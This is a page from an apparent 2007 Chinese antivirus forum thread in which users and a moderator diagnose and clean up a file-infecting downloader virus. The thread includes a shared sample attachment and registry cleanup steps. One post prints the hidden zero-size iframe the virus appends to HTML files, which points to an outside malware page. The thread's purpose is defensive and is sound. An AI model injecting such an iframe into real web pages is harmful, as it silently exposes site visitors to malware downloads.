123   2  /  3  页   跳转

中未知病毒, 求救, 情况严重:(

收藏
woshiright
头像
初生襁褓狮
  • 帖子:17
  • 注册: 2007-10-18
  • 来自:
发表于: 2007-10-18 21:12 | 只看楼主 短消息 资料
字号: 11楼

病毒文件 systom.exe 样本

附件附件:

下载次数:110
文件类型:application/octet-stream
文件大小:
上传时间:2007-10-18 21:12:25
描述:
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2007-10-18 22:08 | 短消息 资料
字号: 12楼

引用:
【woshiright的贴子】病毒文件 systom.exe 样本

………………

你够衰呀!兄弟!
这是个感染型下载器。
中招后,感染硬盘各个分区中的所有htm和html文件;关闭杀软;将系统时间改为2000.10.18。
病毒在所有分区根目录下释放sos.exe和autorun.inf。在系统文件夹中释放systom.exe。另外还下载一堆病毒木马到系统中(详见附件中的SRENG日志)。
建议:用XDELBOX删除日志所见的所有病毒文件。用SRENG删除病毒加载项。那些被感染的htm、html文件等杀软升级后处理吧(太多)。

附件是中招后SRENG所见异常内容。

附件附件:

下载次数:81
文件类型:application/octet-stream
文件大小:
上传时间:2007-10-18 22:08:23
描述:
gototop
 
woshiright
头像
初生襁褓狮
  • 帖子:17
  • 注册: 2007-10-18
  • 来自:
发表于: 2007-10-18 23:12 | 只看楼主 短消息 资料
字号: 13楼

谢谢楼上回复.
他感染所有htm, html 文件, 那么他感染我的 *.exe文件吗
因为我之前已经格式化C盘, 重新安装系统, 但是等我装好系统
开始安装软件时 又中毒.
还有, 我在DOS下也看不到你门说的 sos.exe autorun.inf 文件
没有办法删除他啊
gototop
 
woshiright
头像
初生襁褓狮
  • 帖子:17
  • 注册: 2007-10-18
  • 来自:
发表于: 2007-10-19 00:43 | 只看楼主 短消息 资料
字号: 14楼

各位好
我又发现, 当打开别的盘副时, 病毒会运行一个reg.exe的进程.
而且次进程会自我复制, 不断的打开新的reg.exe进程.
现在我是删除了 在C盘的 reg.exe, sos.exe, systom.exe 文件.
但是 无法打开 别的盘符, 只要一打开, 所有的病毒又都回来
关键是, 在DOS下 都看不到别的盘副有任何病毒文件.
也就是说, D, E, F, G, H 盘下, 没有任何有关 SOS.EXE, SYSTOM.EXE, REG.EXE 的文件.
我该怎么半?
gototop
 
woshiright
头像
初生襁褓狮
  • 帖子:17
  • 注册: 2007-10-18
  • 来自:
发表于: 2007-10-19 01:01 | 只看楼主 短消息 资料
字号: 15楼

谢谢 各位帮忙
病毒暂时以清楚
只是11 楼所说的 "感染硬盘各个分区中的所有htm和html文件"
到底怎么回事, 病毒还会复发吗?
何种情况下会复发? 

gototop
 
爱陌能住
头像
快乐黄口狮
  • 帖子:202
  • 注册: 2007-02-21
  • 来自:江苏
发表于: 2007-10-19 01:14 | 短消息 资料
字号: 16楼

用Icsword可以看到...(并且可以删除.)

如果删除根目录下的autorun.inf.就不要点击硬盘去删了..

另.版主.在删了autorun.inf和它运行的文件后.再想打开硬盘.就不行了...该在哪儿再修改一下呢(是要修改注册表里什么地方吗??)
gototop
 
没有梦想的男人
头像
锋芒艾服狮
  • 帖子:1680
  • 注册: 2007-07-07
  • 来自:
发表于: 2007-10-19 08:58 | 短消息 资料
字号: 17楼

引用:
【爱陌能住的贴子】用Icsword可以看到...(并且可以删除.)

如果删除根目录下的autorun.inf.就不要点击硬盘去删了..

另.版主.在删了autorun.inf和它运行的文件后.再想打开硬盘.就不行了...该在哪儿再修改一下呢(是要修改注册表里什么地方吗??)
………………

用超级巡警U盘免疫器V1.4: http://update3.dswlab.com/antiautorun.zip
运行点上所有本地磁盘再点开始免疫.就可以打开硬盘分区了.
如果不想用这个可以这样操作.
我的电脑--工具--文件夹选项--文件类型--找到驱动器(硬盘图标)--高级--在“操作”里填写“open”,在“用于执行操作的应用程序”里填写explorer.exe,确定。随后返回到“编辑文件类型”窗口,选中open---设为默认值---确定 ,

或者用注册表法:
开始,运行 输入regedit 找到[HKEY_CLASSES_ROOT\Drive\shell]将shell下的键(除了FIND以外)全部删除,Shell的默认值改为none,然后关闭注册表 按键盘F5刷新 双击分区再看
gototop
 
日不懂啊
头像
叱咤花甲狮
  • 帖子:14337
  • 注册: 2007-03-08
  • 来自:江苏南京
发表于: 2007-10-19 09:19 | 短消息 资料
字号: 18楼

LZ这个病毒的样本,解压密码多少?
悄悄话告诉我,谢谢,我也想看看
gototop
 
日不懂啊
头像
叱咤花甲狮
  • 帖子:14337
  • 注册: 2007-03-08
  • 来自:江苏南京
发表于: 2007-10-19 09:28 | 短消息 资料
字号: 19楼

引用:
【baohe的贴子】
你够衰呀!兄弟!
这是个感染型下载器。
中招后,感染硬盘各个分区中的所有htm和html文件;关闭杀软;将系统时间改为2000.10.18。
病毒在所有分区根目录下释放sos.exe和autorun.inf。在系统文件夹中释放systom.exe。另外还下载一堆病毒木马到系统中(详见附件中的SRENG日志)。
建议:用XDELBOX删除日志所见的所有病毒文件。用SRENG删除病毒加载项。那些被感染的htm、html文件等杀软升级后处理吧(太多)。

附件是中招后SRENG所见异常内容。
………………



猫叔~~被感染的htm  html文件手动怎么处理啊?
不重要的删了就好了啊.
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2007-10-19 09:47 | 短消息 资料
字号: 20楼

引用:
【日不懂啊的贴子】


猫叔~~被感染的htm  html文件手动怎么处理啊?
不重要的删了就好了啊.

………………

被感染的htm文件尾部插入代码:<iframe width="0" height="0" src="http://xx.522love.cn/html/ani.htm"></iframe> 
其中的http://xx.522love.cn/html/ani.htm已经失效。

这个下载器难处理在于中招后下载的那堆病毒(详见11楼附件)。估计需用XDELBOX这类工具才能搞掂。


PS:这DD,对我来说是“老熟人”了。即使中了,如果手头有IceSword,且找到病毒的“软肋”,也能暂时控制它,令其不再作恶。回这个帖子时,病毒就在系统中(图)。

附件附件:

下载次数:128
文件类型:image/pjpeg
文件大小:
上传时间:2007-10-19 9:47:26
描述:
预览信息:EXIF信息
gototop
 
<<上一主题|下一主题>>
123   2  /  3  页   跳转
页面顶部
Powered by Discuz!NT